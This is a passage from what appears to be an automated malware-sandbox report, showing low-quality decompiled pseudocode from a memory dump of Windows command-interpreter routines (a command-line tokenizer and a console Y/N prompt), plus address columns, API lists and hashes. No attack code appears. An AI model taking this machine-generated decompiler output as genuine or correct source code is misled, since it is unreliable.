									switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M002AF8A8))) {
										case 0:
											goto L13;
										case 1:
											goto L14;
										case 2:
											L27:
											if((_t169 & 0x0000002a) == 8) {
												goto L28;
											}
											goto L33;
										case 3:
											L28:
											if((_t169 & 0x00000022) == 0) {
												if((_t169 & 0x00000010) != 0 || _t184 != 0x29) {
													goto L13;
												} else {
												}
											}
											goto L33;
										case 4:
											if((__bl & 0x00000022) != 0) {
												goto L33;
											} else {
												if( *0x2cd548 != 0) {
													goto L27;
												} else {
													goto L41;
												}
											}
											goto L140;
										case 5:
											goto L33;
									}
								}
							}
						} else {
							L13:
							_t169 = _t169 & 0xffffffdd;
							_a4 = _t169;
							L14:
							if((_t169 & 0x00000022) == 0) {
								L15:
								 *_t180 = _t184;
								_t183 =  &(_t180[0]);
								_v8 = _t183;
								_t174 = _t183;
								_t136 = iswdigit(_t184);
								_t192 = _t189 + 4;
								if(_t136 != 0) {
									_t184 = E002AF9D5(_t175) & 0x0000ffff;
									_t174 =  &(_t183[0]);
									 *_t183 = _t184;
									_t183 = _t174;
									_v8 = _t183;
								}
								if(_t184 == 0x3e || _t184 == 0x26 || _t184 == 0x7c || _t184 == 0x3c) {
									_t139 = E002AF9D5(_t175) & 0x0000ffff;
									if(_t139 ==  *(_t183 - 2)) {
										 *_t183 = _t139;
										_t183 =  &(_t174[0]);
										_v8 = _t183;
										_t139 = E002AF9D5(_t175) & 0x0000ffff;
										_t174 = _t183;
									}
									_t176 =  *(_t183 - 2) & 0x0000ffff;
									if(_t176 != 0x3e) {
										if(_t176 != 0x3c) {
											goto L79;
										}
										goto L78;
									} else {
										L78:
										if(_t139 == 0x26) {
											 *_t183 = 0x26;
											_t183 =  &(_t174[0]);
											_v8 = _t183;
											goto L109;
											do {
												do {
													L109:
													_t186 = E002AF9D5(_t176) & 0x0000ffff;
													_t148 = iswspace(_t186);
													_t192 = _t192 + 4;
												} while (_t148 != 0);
												_t176 = L"=,;";
											} while (E002AD7D4(L"=,;", _t186) != 0);
											if(iswdigit(_t186) != 0) {
												 *_t183 = _t186;
												_t183 =  &(_t183[0]);
												_v8 = _t183;
												E002AF9D5(_t176);
											}
										}
										L79:
										_t141 =  *0x2db8a4;
										if(_t141 != 0x2d3890) {
											 *0x2db8a4 = _t141 - 2;
										}
										goto L20;
									}
								} else {
									L20:
									 *_t183 = 0;
									return  *_v16 & 0x0000ffff;
								}
							}
							L33:
							if(_t184 == 0x5e) {
								if((_t169 & 0x00000022) != 0) {
									goto L34;
								} else {
									_t184 = E002AF9D5(_t175) & 0x0000ffff;
									if(_t184 == 0) {
										goto L15;
									}
									if(_t184 != 0xa) {
										goto L41;
									} else {
										_t184 = E002AF9D5(_t175) & 0x0000ffff;
										if(_t184 != 0) {
											goto L41;
										} else {
											goto L15;
										}
									}
								}
								goto L140;
							} else {
								L34:
								if(_t184 == 0x22) {
									_t169 = _t169 ^ 0x00000002;
									_a4 = _t169;
								}
								if((_t169 & 0x00000023) == 0) {
									_t155 = iswspace(_t184);
									_t189 = _t189 + 4;
									if(_t155 != 0) {
										goto L15;
									}
									if((_t169 & 0x00000004) != 0) {
										_t156 = 0x2a2102;
									} else {
										_t156 = L"=,;";
									}
									_t157 = wcschr(_t156, _t184);
									_t189 = _t189 + 8;
									if(_t157 != 0) {
										goto L15;
									}
								}
								_t130 = iswdigit(_t184);
								_t189 = _t189 + 4;
								if(_t130 != 0) {
									_t175 =  *0x2db8a4;
									if((_t175 - 0x2d388e & 0xfffffffe) < 4) {
										L88:
										_t135 =  *_t175 & 0x0000ffff;
										if(_t135 != 0x3e) {
											if(_t135 != 0x3c) {
												goto L41;
											} else {
												goto L89;
											}
										} else {
											L89:
											if((_t169 & 0x00000022) == 0) {
												goto L15;
											}
											goto L41;
										}
									} else {
										_t152 =  *(_t175 - 4) & 0x0000ffff;
										_v20 = _t152;
										_t153 = iswspace(_t152);
										_t189 = _t189 + 4;
										if(_t153 == 0) {
											_t175 = L"()|&=,;\"";
											if(E002AD7D4(L"()|&=,;\"", _v20) == 0) {
												goto L41;
											} else {
												goto L87;
											}
										} else {
											L87:
											_t175 =  *0x2db8a4;
											goto L88;
										}
									}
									goto L140;
								}
							}
						}
					}
					L41:
					 *_t180 = _t184;
					_t181 =  &(_t180[0]);
					_a4 = _t169 | 0x00000040;
					 *0x2cd548 = 0;
					_t173 = _t181 - _v16 >> 1;
					while(1) {
						_v8 = _t181;
						_t185 = E002AF9D5(_t175) & 0x0000ffff;
						if( *0x2cd5b4 != 0) {
							goto L131;
						}
						L43:
						_t109 = _t185 & 0x0000ffff;
						if(_t109 < 0x41 || _t109 >= 0x7c) {
							if(_t109 > 0x7c) {
								goto L45;
							} else {
								_t34 = _t109 + 0x2af958; // 0x5050500
								switch( *((intOrPtr*)(( *_t34 & 0x000000ff) * 4 +  &M002AF940))) {
									case 0:
										_t127 = _a4;
										goto L54;
									case 1:
										__eax = _a4;
										goto L55;
									case 2:
										__eax = _a4;
										goto L114;
									case 3:
										L101:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if((__al & 0x00000010) != 0) {
												L54:
												_t102 = _t127 & 0xffffffdd;
												_a4 = _t102;
												L55:
												if((_t102 & 0x00000022) != 0) {
													goto L45;
												}
												goto L62;
											} else {
												if(__si == 0x29) {
													goto L45;
												} else {
													goto L54;
												}
											}
										}
										goto L140;
									case 4:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if( *0x2cd548 == 0) {
												goto L49;
											} else {
												L114:
												__al = __al & 0x0000002a;
												if(__al != 8) {
													goto L45;
												} else {
													goto L101;
												}
											}
										}
										goto L140;
									case 5:
										goto L45;
								}
							}
						} else {
							L45:
							_t110 = _a4;
							if(_t185 == 0x5e) {
								if((_t110 & 0x00000022) != 0) {
									goto L46;
								} else {
									_t185 = E002AF9D5(_t175) & 0x0000ffff;
									if(_t185 == 0) {
										goto L61;
									} else {
										if(_t185 != 0xa) {
											goto L49;
										} else {
											_t185 = E002AF9D5(_t175) & 0x0000ffff;
											if(_t185 == 0) {
												goto L61;
											} else {
												goto L49;
											}
										}
									}
								}
								goto L140;
							} else {
								L46:
								if(_t185 == 0x22) {
									_t110 = _t110 ^ 0x00000002;
									_a4 = _t110;
								}
								if((_t110 & 0x00000023) == 0) {
									_t111 = iswspace(_t185);
									_t189 = _t189 + 4;
									if(_t111 != 0) {
										goto L61;
									} else {
										if((_a4 & 0x00000004) != 0) {
											_t112 = 0x2a2102;
										} else {
											_t112 = L"=,;";
										}
										_t113 = wcschr(_t112, _t185);
										_t189 = _t189 + 8;
										if(_t113 == 0) {
											goto L48;
										} else {
											goto L61;
										}
									}
								} else {
									L48:
									_t114 = iswdigit(_t185);
									_t189 = _t189 + 4;
									if(_t114 != 0) {
										_t175 =  *0x2db8a4;
										if((_t175 - 0x2d388e & 0xfffffffe) < 4) {
											L70:
											_t120 =  *( *0x2db8a4) & 0x0000ffff;
											if(_t120 == 0x3e || _t120 == 0x3c) {
												_t102 = _a4;
												if((_t102 & 0x00000022) == 0) {
													goto L62;
												} else {
													goto L49;
												}
											} else {
												goto L49;
											}
										} else {
											_t121 =  *(_t175 - 4) & 0x0000ffff;
											_v20 = _t121;
											_t122 = iswspace(_t121);
											_t189 = _t189 + 4;
											if(_t122 != 0) {
												goto L70;
											} else {
												_t123 = wcschr(L"()|&=,;\"", _v20);
												_t189 = _t189 + 8;
												if(_t123 == 0) {
													goto L49;
												} else {
													goto L70;
												}
											}
										}
										goto L140;
									} else {
										L49:
										if(_t173 >= _v12 - 1) {
											L61:
											_t102 = _a4;
										} else {
											 *_t181 = _t185;
											_t181 =  &(_t181[0]);
											_t173 = _t173 + 1;
											continue;
										}
									}
								}
							}
						}
						L62:
						_a4 = _t102 & 0xffffffbf;
						 *_t181 = 0;
						_t182 = _v12;
						_t47 = _t182 - 1; // 0x3
						if(_t173 < _t47) {
							_t175 =  *0x2db8a4;
							if( *0x2db8a4 != 0x2d3890) {
								 *0x2db8a4 =  *0x2db8a4 - 2;
							}
						}
						if(_t173 >= _t182) {
							if(_t185 != 0xffff) {
								_t92 = E002AC5A2(_t175, 0x234f, 1, _v16);
								goto L139;
							}
						}
						return 0x4000;
						goto L140;
						L131:
						 *0x2cd5b4 = 0;
						if((_a4 & 0x00000040) != 0) {
							goto L49;
						} else {
							_t185 = E002AF9D5(_t175) & 0x0000ffff;
							goto L43;
						}
						goto L140;
					}
				}
				goto L140;
			}

















































                                              0x002af300
                                              0x002af300
                                              0x002af30b
                                              0x002af30d
                                              0x002af312
                                              0x002af315
                                              0x002af318
                                              0x002af31d
                                              0x002af322
                                              0x002bc593
                                              0x00000000
                                              0x002bc593
                                              0x002af328
                                              0x002af32d
                                              0x002af432
                                              0x002bc4dc
                                              0x002bc4e7
                                              0x002bc4ec
                                              0x002af43d
                                              0x002af44a
                                              0x002af333
                                              0x002af337
                                              0x00000000
                                              0x00000000
                                              0x002af33d
                                              0x002af345
                                              0x002af34a
                                              0x002af350
                                              0x002af352
                                              0x002af357
                                              0x002af35b
                                              0x002af361
                                              0x002af366
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af352
                                              0x002af357
                                              0x002af35b
                                              0x002af361
                                              0x002af364
                                              0x002af36d
                                              0x002af370
                                              0x002af744
                                              0x002af376
                                              0x002af376
                                              0x002af376
                                              0x002af37d
                                              0x002af383
                                              0x002af388
                                              0x002af6de
                                              0x00000000
                                              0x002af6e4
                                              0x00000000
                                              0x002af6e4
                                              0x002af6de
                                              0x002af38e
                                              0x002af38e
                                              0x002af398
                                              0x002af39d
                                              0x002af39d
                                              0x00000000
                                              0x002af398
                                              0x002af352
                                              0x002af3a2
                                              0x002af3ae
                                              0x002af3b1
                                              0x002bc4f4
                                              0x002bc501
                                              0x00000000
                                              0x002bc507
                                              0x002bc50c
                                              0x00000000
                                              0x002bc50c
                                              0x00000000
                                              0x002af3b7
                                              0x002af3b7
                                              0x002af3b7
                                              0x002af3bd
                                              0x002af450
                                              0x002af48a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af452
                                              0x002af452
                                              0x002af455
                                              0x00000000
                                              0x002af457
                                              0x002af457
                                              0x002af45e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af465
                                              0x002af46b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af46d
                                              0x002af470
                                              0x002af475
                                              0x00000000
                                              0x00000000
                                              0x002af485
                                              0x002af475
                                              0x00000000
                                              0x00000000
                                              0x002af7bb
                                              0x00000000
                                              0x002af7c1
                                              0x002af7c8
                                              0x00000000
                                              0x002af7ce
                                              0x00000000
                                              0x002af7ce
                                              0x002af7c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af45e
                                              0x002af455
                                              0x002af3c3
                                              0x002af3c3
                                              0x002af3c3
                                              0x002af3c6
                                              0x002af3c9
                                              0x002af3cc
                                              0x002af3d2
                                              0x002af3d2
                                              0x002af3d5
                                              0x002af3d9
                                              0x002af3dc
                                              0x002af3de
                                              0x002af3e4
                                              0x002af3e9
                                              0x002af76d
                                              0x002af770
                                              0x002af773
                                              0x002af776
                                              0x002af778
                                              0x002af778
                                              0x002af3f3
                                              0x002af681
                                              0x002af688
                                              0x002af6c6
                                              0x002af6c9
                                              0x002af6cc
                                              0x002af6d4
                                              0x002af6d7
                                              0x002af6d7
                                              0x002af68a
                                              0x002af691
                                              0x002af739
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af697
                                              0x002af697
                                              0x002af69b
                                              0x002af7d8
                                              0x002af7db
                                              0x002af7de
                                              0x002af7de
                                              0x002af7e1
                                              0x002af7e1
                                              0x002af7e1
                                              0x002af7e6
                                              0x002af7ea
                                              0x002af7f0
                                              0x002af7f3
                                              0x002af7f9
                                              0x002af803
                                              0x002af813
                                              0x002af819
                                              0x002af81c
                                              0x002af81f
                                              0x002af822
                                              0x002af822
                                              0x002af813
                                              0x002af6a1
                                              0x002af6a1
                                              0x002af6ab
                                              0x002af6b4
                                              0x002af6b4
                                              0x00000000
                                              0x002af6ab
                                              0x002af417
                                              0x002af417
                                              0x002af419
                                              0x00000000
                                              0x002af41f
                                              0x002af3f3
                                              0x002af48c
                                              0x002af490
                                              0x002af868
                                              0x00000000
                                              0x002af86e
                                              0x002af873
                                              0x002af879
                                              0x00000000
                                              0x00000000
                                              0x002af882
                                              0x00000000
                                              0x002af888
                                              0x002bc519
                                              0x002bc51f
                                              0x00000000
                                              0x002bc525
                                              0x00000000
                                              0x002bc525
                                              0x002bc51f
                                              0x002af882
                                              0x00000000
                                              0x002af496
                                              0x002af496
                                              0x002af49a
                                              0x002af780
                                              0x002af783
                                              0x002af783
                                              0x002af4a3
                                              0x002af4a6
                                              0x002af4ac
                                              0x002af4b1
                                              0x00000000
                                              0x00000000
                                              0x002af4ba
                                              0x002af74e
                                              0x002af4c0
                                              0x002af4c0
                                              0x002af4c0
                                              0x002af4c7
                                              0x002af4cd
                                              0x002af4d2
                                              0x00000000
                                              0x00000000
                                              0x002af4d2
                                              0x002af4d9
                                              0x002af4df
                                              0x002af4e4
                                              0x002af6e9
                                              0x002af6ff
                                              0x002af720
                                              0x002af720
                                              0x002af726
                                              0x002af78e
                                              0x00000000
                                              0x002af794
                                              0x00000000
                                              0x002af794
                                              0x002af728
                                              0x002af728
                                              0x002af72b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af731
                                              0x002af701
                                              0x002af701
                                              0x002af706
                                              0x002af709
                                              0x002af70f
                                              0x002af714
                                              0x002af890
                                              0x002af89c
                                              0x00000000
                                              0x002af8a2
                                              0x00000000
                                              0x002af8a2
                                              0x002af71a
                                              0x002af71a
                                              0x002af71a
                                              0x00000000
                                              0x002af71a
                                              0x002af714
                                              0x00000000
                                              0x002af6ff
                                              0x002af4e4
                                              0x002af490
                                              0x002af3bd
                                              0x002af4ea
                                              0x002af4ed
                                              0x002af4f0
                                              0x002af4f3
                                              0x002af4f8
                                              0x002af505
                                              0x002af507
                                              0x002af507
                                              0x002af516
                                              0x002af519
                                              0x00000000
                                              0x00000000
                                              0x002af51f
                                              0x002af51f
                                              0x002af525
                                              0x002af56d
                                              0x00000000
                                              0x002af56f
                                              0x002af56f
                                              0x002af576
                                              0x00000000
                                              0x002af57d
                                              0x00000000
                                              0x00000000
                                              0x002af6be
                                              0x00000000
                                              0x00000000
                                              0x002af82c
                                              0x00000000
                                              0x00000000
                                              0x002af796
                                              0x002af796
                                              0x002af79b
                                              0x00000000
                                              0x002af7a1
                                              0x002af7a3
                                              0x002af580
                                              0x002af580
                                              0x002af583
                                              0x002af586
                                              0x002af588
                                              0x00000000
                                              0x002af58a
                                              0x00000000
                                              0x002af7a9
                                              0x002af7ad
                                              0x00000000
                                              0x002af7b3
                                              0x00000000
                                              0x002af7b3
                                              0x002af7ad
                                              0x002af7a3
                                              0x00000000
                                              0x00000000
                                              0x002af758
                                              0x002af75d
                                              0x00000000
                                              0x002af763
                                              0x002bc552
                                              0x00000000
                                              0x002bc558
                                              0x002af82f
                                              0x002af82f
                                              0x002af833
                                              0x00000000
                                              0x002af839
                                              0x00000000
                                              0x002af839
                                              0x002af833
                                              0x002bc552
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af576
                                              0x002af52c
                                              0x002af52c
                                              0x002af52c
                                              0x002af533
                                              0x002af840
                                              0x00000000
                                              0x002af846
                                              0x002af84b
                                              0x002af851
                                              0x00000000
                                              0x002af857
                                              0x002af85a
                                              0x00000000
                                              0x002af860
                                              0x002bc562
                                              0x002bc568
                                              0x00000000
                                              0x002bc56e
                                              0x00000000
                                              0x002bc56e
                                              0x002bc568
                                              0x002af85a
                                              0x002af851
                                              0x00000000
                                              0x002af539
                                              0x002af539
                                              0x002af53d
                                              0x002af671
                                              0x002af674
                                              0x002af674
                                              0x002af545
                                              0x002af58d
                                              0x002af593
                                              0x002af598
                                              0x00000000
                                              0x002af59a
                                              0x002af59e
                                              0x002af667
                                              0x002af5a4
                                              0x002af5a4
                                              0x002af5a4
                                              0x002af5ab
                                              0x002af5b1
                                              0x002af5b6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af5b6
                                              0x002af547
                                              0x002af547
                                              0x002af548
                                              0x002af54e
                                              0x002af553
                                              0x002af5fb
                                              0x002af611
                                              0x002af641
                                              0x002af646
                                              0x002af64c
                                              0x002af657
                                              0x002af65c
                                              0x00000000
                                              0x002af662
                                              0x00000000
                                              0x002af662
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af613
                                              0x002af613
                                              0x002af618
                                              0x002af61b
                                              0x002af621
                                              0x002af626
                                              0x00000000
                                              0x002af628
                                              0x002af630
                                              0x002af636
                                              0x002af63b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002af63b
                                              0x002af626
                                              0x00000000
                                              0x002af559
                                              0x002af559
                                              0x002af55f
                                              0x002af5b8
                                              0x002af5b8
                                              0x002af561
                                              0x002af561
                                              0x002af564
                                              0x002af567
                                              0x00000000
                                              0x002af567
                                              0x002af55f
                                              0x002af553
                                              0x002af545
                                              0x002af533
                                              0x002af5bb
                                              0x002af5be
                                              0x002af5c3
                                              0x002af5c6
                                              0x002af5c9
                                              0x002af5ce
                                              0x002af5d0
                                              0x002af5dc
                                              0x002af5de
                                              0x002af5de
                                              0x002af5dc
                                              0x002af5e7
                                              0x002bc57b
                                              0x002bc58b
                                              0x00000000
                                              0x002bc590
                                              0x002bc57b
                                              0x002af5f8
                                              0x00000000
                                              0x002bc52a
                                              0x002bc52e
                                              0x002bc538
                                              0x00000000
                                              0x002bc53e
                                              0x002bc543
                                              0x00000000
                                              0x002bc543
                                              0x00000000
                                              0x002bc538
                                              0x002af507
                                              0x00000000

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: iswspace$wcschr$iswdigit$_setjmp3
                                              • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                              • API String ID: 1805751789-2755026540
                                              • Opcode ID: 318b8cc71a60661e0e298c4942a149cb2e7570e0be6aa0d7171fc6ee1af06cd7
                                              • Instruction ID: 93affd19c2d5d132e53c110bf8e04bb2193667a083baf888e439a9d4f90c11ac
                                              • Opcode Fuzzy Hash: 318b8cc71a60661e0e298c4942a149cb2e7570e0be6aa0d7171fc6ee1af06cd7
                                              • Instruction Fuzzy Hash: F3E1C272D302429BCBA08FE8AB8977A77A4AF17350F680036E945D7191DF7C8D709B52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C9583, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 247COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 59%
                                              			E002C9583(void* __ecx, intOrPtr __edx, char _a4) {
				signed int _v12;
				long _v44;
				char _v45;
				char _v46;
				long _v52;
				long _v56;
				long _v60;
				long _v64;
				intOrPtr _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				intOrPtr _t58;
				void* _t69;
				signed int _t74;
				void* _t81;
				signed int _t93;
				void _t94;
				signed int _t98;
				char _t100;
				void* _t101;
				signed int* _t105;
				intOrPtr* _t106;
				void* _t114;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				long _t128;
				void* _t130;
				wchar_t* _t131;
				long _t134;
				signed int _t135;
				void* _t136;
				void* _t137;
				void* _t138;

				_t104 = __ecx;
				_t51 =  *0x2cd0b4; // 0x40f69e4c
				_v12 = _t51 ^ _t135;
				_t100 = _a4;
				_t128 = 0;
				_v68 = __edx;
				_v72 = __ecx;
				_v56 = 0;
				_v45 = 0;
				_v46 = 0;
				if(__edx != 0x400023d3) {
					L5:
					_push(_t100);
					_t124 = E002AB3FC(_t104);
					_t137 = _t136 + 4;
					if(_t124 == 0) {
						L10:
						_t105 =  &_v44;
						_t120 = 0x10;
						_t130 = L"NY" - _t105;
						while(1) {
							_t12 = _t120 + 0x7fffffee; // 0x7ffffffe
							if(_t12 == 0) {
								break;
							}
							_t93 =  *(_t130 + _t105) & 0x0000ffff;
							if(_t93 == 0) {
								break;
							}
							 *_t105 = _t93;
							_t105 =  &(_t105[0]);
							_t120 = _t120 - 1;
							if(_t120 != 0) {
								continue;
							}
							L16:
							_t105 = _t105 - 2;
							L17:
							_t128 = 0;
							 *_t105 = 0;
							L18:
							_t106 =  &_v44;
							_t121 = _t106 + 2;
							do {
								_t58 =  *_t106;
								_t106 = _t106 + 2;
							} while (_t58 != 0);
							_t108 = _t106 - _t121 >> 1;
							_v80 = (_t106 - _t121 >> 1) - 1;
							LocalFree(_t124);
							_t101 = GetStdHandle(0xfffffff5);
							_v88 = _t101;
							if(GetConsoleMode(_t101,  &_v60) != 0) {
								_t108 = _v60 | 0x00000001;
								_v45 = 1;
								SetConsoleMode(_t101, _v60 | 0x00000001);
							}
							_t125 = GetStdHandle(0xfffffff6);
							_v84 = _t125;
							if(GetConsoleMode(_t125,  &_v64) != 0) {
								_t108 = _v64 | 0x00000007;
								SetConsoleMode(_t125, _v64 | 0x00000007);
								_t134 =  *0x2d3888;
								if(_t134 != 0) {
									_t108 = _t134;
									 *0x2e94b4(L"<noalias>");
									 *_t134();
								}
								_t128 = 0;
							}
							_t126 = _v68;
							while(1) {
								_t100 = 1;
								_v52 = 0;
								_t68 = _v72;
								if(_v72 == 0) {
									_push(0);
									_push(_t126);
									_t69 = E002AC108(_t108);
									_t138 = _t137 + 8;
								} else {
									_t69 = E002AC108(_t108, _t126, 1, _t68);
									_t138 = _t137 + 0xc;
								}
								_t108 = 0;
								if(E002B0178(_t69) != 0) {
									FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
								}
								if(_v52 == 0xa) {
									goto L45;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t81 = GetStdHandle(0xfffffff6);
									_t121 =  &_v52;
									_t108 = _t81;
									if(E002C3B11(_t81,  &_v52, 1,  &_v76) == 0 || _v76 != 1) {
										break;
									}
									if(_t100 != 0) {
										_t128 = towupper(_v52) & 0x0000ffff;
										_t138 = _t138 + 4;
										_v56 = _t128;
									}
									_t108 = 0;
									_t100 = 0;
									if(E002B0178(_t82) == 0 || ( *0x2e3aa0 & 0x00000001) == 0) {
										_push(_v52 & 0x0000ffff);
										E002B25D9(L"%c");
										_t138 = _t138 + 8;
									}
									if(_v52 != 0xa) {
										continue;
									} else {
										goto L45;
									}
								}
								_t128 = _v44 & 0x0000ffff;
								_v56 = _t128;
								E002B25D9(L"\r\n");
								_t138 = _t138 + 4;
								L45:
								_t131 = wcschr( &_v44, _t128);
								_t137 = _t138 + 8;
								if(_t131 == 0) {
									L28:
									_t128 = _v56;
									continue;
								}
								_t133 = _t131 -  &_v44 >> 1;
								if(_t133 > _v80) {
									goto L28;
								}
								_t127 = _v84;
								if(_v45 != 0) {
									SetConsoleMode(_v88, _v60);
								}
								if(_t100 != 0) {
									SetConsoleMode(_t127, _v64);
									_t127 =  *0x2d3888;
									if(_t127 != 0) {
										 *0x2e94b4(L"CMD.EXE");
										 *_t127();
									}
								}
								_t74 = _t133;
								L53:
								return E002B6FD0(_t74, _t100, _v12 ^ _t135, _t121, _t127, _t133);
							}
						}
						if(_t120 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t114 = _t124;
					_t8 = _t114 + 2; // 0x2
					_t122 = _t8;
					do {
						_t94 =  *_t114;
						_t114 = _t114 + 2;
					} while (_t94 != 0);
					if(_t114 - _t122 >> 1 >= 0x10) {
						goto L10;
					}
					E002B1040( &_v44, 0x10, _t124);
					__imp___wcsupr( &_v44);
					_t137 = _t137 + 4;
					goto L18;
				}
				_t136 = _t136 - 8;
				_t121 = 0;
				_t127 = E002A5DB5(__ecx, 0);
				if(_t127 == 0xffffffff) {
					goto L5;
				}
				_t98 = E002B0178(_t97);
				_t104 = _t127;
				_t133 = _t98;
				E002ADB92(_t127);
				if(_t98 == 0) {
					_t128 = 0;
					goto L5;
				}
				_t74 = 2;
				goto L53;
			}















































                                              0x002c9583
                                              0x002c958b
                                              0x002c9592
                                              0x002c9596
                                              0x002c959c
                                              0x002c959e
                                              0x002c95a1
                                              0x002c95a4
                                              0x002c95a7
                                              0x002c95ab
                                              0x002c95b6
                                              0x002c95e9
                                              0x002c95e9
                                              0x002c95ef
                                              0x002c95f1
                                              0x002c95f6
                                              0x002c9634
                                              0x002c9634
                                              0x002c963e
                                              0x002c9643
                                              0x002c9645
                                              0x002c9645
                                              0x002c964d
                                              0x00000000
                                              0x00000000
                                              0x002c964f
                                              0x002c9656
                                              0x00000000
                                              0x00000000
                                              0x002c9658
                                              0x002c965b
                                              0x002c965e
                                              0x002c9661
                                              0x00000000
                                              0x00000000
                                              0x002c9669
                                              0x002c9669
                                              0x002c966c
                                              0x002c966e
                                              0x002c9670
                                              0x002c9673
                                              0x002c9673
                                              0x002c9676
                                              0x002c9679
                                              0x002c9679
                                              0x002c967c
                                              0x002c967f
                                              0x002c9686
                                              0x002c968c
                                              0x002c968f
                                              0x002c969d
                                              0x002c96a4
                                              0x002c96af
                                              0x002c96b4
                                              0x002c96b7
                                              0x002c96bd
                                              0x002c96bd
                                              0x002c96cb
                                              0x002c96d2
                                              0x002c96dd
                                              0x002c96e4
                                              0x002c96e9
                                              0x002c96ef
                                              0x002c96f7
                                              0x002c96fe
                                              0x002c9700
                                              0x002c9706
                                              0x002c9706
                                              0x002c9708
                                              0x002c9708
                                              0x002c970f
                                              0x002c9717
                                              0x002c9719
                                              0x002c971b
                                              0x002c971f
                                              0x002c9724
                                              0x002c9734
                                              0x002c9736
                                              0x002c9737
                                              0x002c973c
                                              0x002c9726
                                              0x002c972a
                                              0x002c972f
                                              0x002c972f
                                              0x002c973f
                                              0x002c9748
                                              0x002c9753
                                              0x002c9753
                                              0x002c975e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c9764
                                              0x002c9764
                                              0x002c976c
                                              0x002c9772
                                              0x002c9775
                                              0x002c977e
                                              0x00000000
                                              0x00000000
                                              0x002c9788
                                              0x002c9793
                                              0x002c9796
                                              0x002c9799
                                              0x002c9799
                                              0x002c979c
                                              0x002c979e
                                              0x002c97a7
                                              0x002c97b6
                                              0x002c97bc
                                              0x002c97c1
                                              0x002c97c1
                                              0x002c97c9
                                              0x00000000
                                              0x002c97cb
                                              0x00000000
                                              0x002c97cb
                                              0x002c97c9
                                              0x002c97cd
                                              0x002c97d6
                                              0x002c97d9
                                              0x002c97de
                                              0x002c97e1
                                              0x002c97ec
                                              0x002c97ee
                                              0x002c97f3
                                              0x002c9714
                                              0x002c9714
                                              0x00000000
                                              0x002c9714
                                              0x002c97fe
                                              0x002c9803
                                              0x00000000
                                              0x00000000
                                              0x002c980d
                                              0x002c9810
                                              0x002c9818
                                              0x002c9818
                                              0x002c9820
                                              0x002c9826
                                              0x002c982c
                                              0x002c9834
                                              0x002c983d
                                              0x002c9843
                                              0x002c9843
                                              0x002c9834
                                              0x002c9845
                                              0x002c9847
                                              0x002c9857
                                              0x002c9857
                                              0x002c9717
                                              0x002c9667
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c9667
                                              0x002c95f8
                                              0x002c95fa
                                              0x002c95fa
                                              0x002c9603
                                              0x002c9603
                                              0x002c9606
                                              0x002c9609
                                              0x002c9615
                                              0x00000000
                                              0x00000000
                                              0x002c9620
                                              0x002c9629
                                              0x002c962f
                                              0x00000000
                                              0x002c962f
                                              0x002c95b8
                                              0x002c95bb
                                              0x002c95c2
                                              0x002c95c7
                                              0x00000000
                                              0x00000000
                                              0x002c95cb
                                              0x002c95d0
                                              0x002c95d2
                                              0x002c95d4
                                              0x002c95db
                                              0x002c95e7
                                              0x00000000
                                              0x002c95e7
                                              0x002c95dd
                                              0x00000000

                                              APIs
                                              • _wcsupr.MSVCRT ref: 002C9629
                                              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 002C968F
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 002C9697
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002C96A7
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002C96BD
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 002C96C5
                                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002C96D5
                                              • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 002C96E9
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 002C974C
                                              • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 002C9753
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 002C976C
                                              • towupper.MSVCRT ref: 002C978D
                                              • wcschr.MSVCRT ref: 002C97E6
